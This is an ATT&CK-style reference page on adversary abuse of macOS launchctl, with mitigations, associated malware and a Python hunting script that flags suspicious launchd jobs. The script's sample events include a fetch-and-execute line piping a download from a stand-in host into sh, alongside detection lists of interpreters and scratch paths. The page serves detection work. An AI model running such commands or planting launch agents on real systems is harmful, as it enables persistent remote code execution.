Execution

T1569.001: Launchctl

T1569.001 · Sub-technique · 1 platform

Description

Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)

Adversaries use launchctl to execute commands and programs as Launch Agents or Launch Daemons. Common subcommands include `launchctl load`, `launchctl unload`, and `launchctl start` (on current macOS the `bootstrap` and `bootout` subcommands are the equivalents of `load` and `unload`, and `launchctl submit` runs an ad-hoc program without a plist). Adversaries can run these from scripts or by hand, for example `launchctl load -w "%s/Library/LaunchAgents/%s"` (a format string whose placeholders the malware fills in at runtime) or `/bin/launchctl load`, to execute Launch Agents or Launch Daemons. The `-w` flag overrides the plist's Disabled key, so the job is forced enabled and will be loaded again on the next login or boot.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)

Platforms

macOS

Mitigations (1)

M1018 User Account Management

Prevent users from installing their own launch agents or launch daemons.

Associated Software (6)

ID, Name, Type: Context

S0451 LoudMiner (Malware): [LoudMiner](https://attack.mitre.org/software/S0451) launched the QEMU services in the `/Library/LaunchDaemons/` folder using launchc...
S1153 Cuckoo Stealer (Malware): [Cuckoo Stealer](https://attack.mitre.org/software/S1153) can use `launchctl` to load a LaunchAgent for persistence.(Citation: Kandji Cuckoo April 202...
S0584 AppleJeus (Malware): [AppleJeus](https://attack.mitre.org/software/S0584) has loaded a plist file using the `launchctl` command.(Citation: CISA AppleJeus Feb 20...
S1048 macOS.OSAMiner (Malware): [macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `launchctl` to restart the [Launch Agent](https://attack.mitre.org/techniques/T1543...
S0658 XCSSET (Malware): [XCSSET](https://attack.mitre.org/software/S0658) loads a system level launchdaemon using the `launchctl load -w` command from /Syste...
S0274 Calisto (Malware): [Calisto](https://attack.mitre.org/software/S0274) uses launchctl to enable screen sharing on the victim's machine.(Citation: Securelist Calisto July ...

Frequently Asked Questions

What is T1569.001 (Launchctl)?

T1569.001 is a MITRE ATT&CK sub-technique named 'Launchctl'. It belongs to the Execution tactic. Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.

How can T1569.001 be detected?

Detection of T1569.001 (Launchctl) centres on process-creation telemetry for launchctl itself: record the full command line and alert on loading subcommands (load, unload, start, and the newer bootstrap, bootout and submit forms) that reference plists under ~/Library/LaunchAgents, /Library/LaunchAgents or /Library/LaunchDaemons, especially when the same process tree wrote the plist moments earlier. Pair this with file-modification monitoring of those directories and with inspection of the referenced plist (Label, ProgramArguments, RunAtLoad), because the launchctl process is short-lived while the plist shows what launchd will actually execute. Legitimate installers call launchctl constantly, so alerting should key on the loaded job (its label, program path and parent process) rather than on launchctl alone.
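The following is an added example, not code from MITRE ATT&CK or from any of the software entries above. It implements the hunt just described for the subcommands named in the Description (load, unload, start, plus the bootstrap, bootout and submit forms): it parses launchctl invocations out of process-creation records, reads the referenced plist with the standard library's plistlib, and flags a job when its label mimics Apple's but lives outside Apple's own launchd directories, when the program is a shell or other interpreter, when it references a scratch directory, or when the plist is already gone at load time. The events, plist contents, paths and the directory and interpreter lists are constructed for the example and are assumptions, not real telemetry or a vetted rule set.

```python
"""Hunt for launchctl-driven execution in process telemetry (added example, not MITRE code)."""
import plistlib
import shlex

# Subcommands that make launchd load or run a job. load/unload are the legacy forms,
# bootstrap/bootout their modern equivalents; submit runs an ad-hoc program with no plist.
LOADING_SUBCOMMANDS = {"load", "unload", "bootstrap", "bootout", "submit", "start", "kickstart"}
# Apple's own jobs live here; a com.apple.* label anywhere else is a masquerade (assumption).
APPLE_AGENT_DIRS = ("/System/Library/LaunchAgents/", "/System/Library/LaunchDaemons/")
# Heuristic lists used by the scoring below; tune them for your fleet (assumptions).
SCRATCH_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/", "/Library/Caches/")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl", "curl"}

# Constructed sample process-creation events (EDR style); not real telemetry.
SAMPLE_EVENTS = [
    {"user": "alice", "cmdline": "launchctl load -w /Users/alice/Library/LaunchAgents/com.apple.softwareupdate.plist"},
    {"user": "alice", "cmdline": "/bin/launchctl load /Users/alice/Library/LaunchAgents/com.example.sync.plist"},
    {"user": "root", "cmdline": "launchctl bootstrap system /Library/LaunchDaemons/com.example.qemu.plist"},
    {"user": "alice", "cmdline": "launchctl submit -l com.example.shell -- /bin/sh -c 'curl http://198.51.100.7/p | sh'"},
    {"user": "alice", "cmdline": "launchctl start com.example.sync"},
    {"user": "alice", "cmdline": "launchctl list"},
    {"user": "alice", "cmdline": "launchctl load /Users/alice/Library/LaunchAgents/com.example.gone.plist"},
]

# Constructed plist files keyed by path, serialised with plistlib so the parser is really exercised.
SAMPLE_PLISTS = {path: plistlib.dumps(job) for path, job in {
    "/Users/alice/Library/LaunchAgents/com.apple.softwareupdate.plist": {
        "Label": "com.apple.softwareupdate",
        "ProgramArguments": ["/bin/sh", "-c", "/tmp/.update/agent"],
        "RunAtLoad": True,
    },
    "/Users/alice/Library/LaunchAgents/com.example.sync.plist": {
        "Label": "com.example.sync",
        "ProgramArguments": ["/Applications/Sync.app/Contents/MacOS/sync"],
        "RunAtLoad": True,
    },
    "/Library/LaunchDaemons/com.example.qemu.plist": {
        "Label": "com.example.qemu",
        "ProgramArguments": ["/usr/local/bin/qemu-system-x86_64", "-nographic"],
        "KeepAlive": True,
    },
}.items()}


def parse_launchctl(cmdline):
    """Split a launchctl command line into (subcommand, flags, plist_path, inline_argv, label).

    Returns None when the process is not launchctl at all.
    """
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "launchctl":
        return None
    sub = argv[1] if len(argv) > 1 else ""
    rest = argv[2:]
    # 'launchctl submit -l label -- prog args': everything after '--' is the program launchd runs.
    inline = rest[rest.index("--") + 1:] if "--" in rest else []
    head = rest[:rest.index("--")] if "--" in rest else rest
    flags = [a for a in head if a.startswith("-")]
    plist = next((a for a in head if a.endswith(".plist")), None)
    label = head[head.index("-l") + 1] if "-l" in head else None
    if label is None and sub == "start" and head:
        label = head[-1]  # 'launchctl start <label>'
    return sub, flags, plist, inline, label


def job_from_plist(data):
    """Return (Label, argv) that launchd will execute for a serialised plist."""
    job = plistlib.loads(data)
    argv = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    return job.get("Label", ""), argv


def assess(event, plist_store):
    """Score one event. None = not a loading launchctl call; [] reasons = nothing suspicious."""
    parsed = parse_launchctl(event["cmdline"])
    if parsed is None or parsed[0] not in LOADING_SUBCOMMANDS:
        return None  # not launchctl, or a read-only subcommand such as 'list'
    sub, flags, plist, argv, label = parsed
    reasons = []
    if plist:
        if plist in plist_store:
            label, argv = job_from_plist(plist_store[plist])
        else:
            reasons.append(f"plist absent at load time: {plist}")  # e.g. removed right after loading
        if label and label.startswith("com.apple.") and not plist.startswith(APPLE_AGENT_DIRS):
            reasons.append(f"Apple-style label {label} outside Apple's own launchd directories")
    exe = argv[0].rsplit("/", 1)[-1] if argv else ""
    if exe in INTERPRETERS:
        reasons.append(f"job runs an interpreter: {' '.join(argv)}")
    if any(a.startswith(SCRATCH_DIRS) for a in argv):
        reasons.append("job references a scratch or user-writable directory")
    return {"user": event["user"], "cmd": sub, "flags": flags, "label": label, "reasons": reasons}


def hunt(events, plist_store):
    """Return only the loading launchctl calls that collected at least one reason."""
    findings = []
    for event in events:
        result = assess(event, plist_store)
        if result and result["reasons"]:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS, SAMPLE_PLISTS):
        print(finding["user"], finding["cmd"], finding["label"], "|", "; ".join(finding["reasons"]))
```

On the constructed input this flags the masquerading com.apple.softwareupdate agent (three reasons), the `submit` call that hands a shell one-liner to launchd, and the load of a plist that no longer exists, while the legitimate-looking sync agent, the QEMU daemon, the `start` call and `launchctl list` pass through silently. The `flags` field is kept in each finding so an analyst can see `-w` (forced enable) without it being a trigger on its own, since legitimate installers use it constantly.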

What mitigations exist for T1569.001?

There is one documented mitigation for T1569.001: User Account Management (M1018), which prevents users from installing their own launch agents or launch daemons.

Which threat groups use T1569.001?

This page lists no threat-group entries for T1569.001; its observed real-world use comes from the six associated software entries above (LoudMiner, Cuckoo Stealer, AppleJeus, macOS.OSAMiner, XCSSET and Calisto). Check the MITRE ATT&CK website for the latest threat intelligence.